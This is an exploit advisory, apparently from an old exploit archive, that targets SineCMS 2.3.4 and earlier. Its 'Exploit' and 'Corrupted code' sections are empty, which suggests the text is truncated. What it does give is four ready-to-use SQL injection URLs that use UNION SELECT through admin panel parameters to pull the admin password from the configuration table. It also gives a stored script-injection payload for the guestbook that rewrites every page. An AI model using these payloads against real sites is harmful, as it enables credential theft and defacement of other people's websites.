Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
SineCMS <= 2.3.4 Calendar SQL Injection 'n something else…
#By KiNgOfThEwOrLd
Notes:
Corrupted file:
Corrupted code:
Exploit:
Something else…
There are a lots of useless sql injection in the admin panel, like…
http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,6+from+sine_configuration/*
http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*
http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9+from+sine_configuration/*
http://[target]/[sinecms_path]/admin/mods_adm.php?mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9+from+sine_configuration/*
There is also a permanent html injection in the guestbook, and i belive it can be considered so
dangerous, coz the "last comments" module it's included in all the pages…then, an attacker can
rewrite alle the pages posting a comment like
<script>document.body.innerHTML="[Arbitrary_Code]";</script>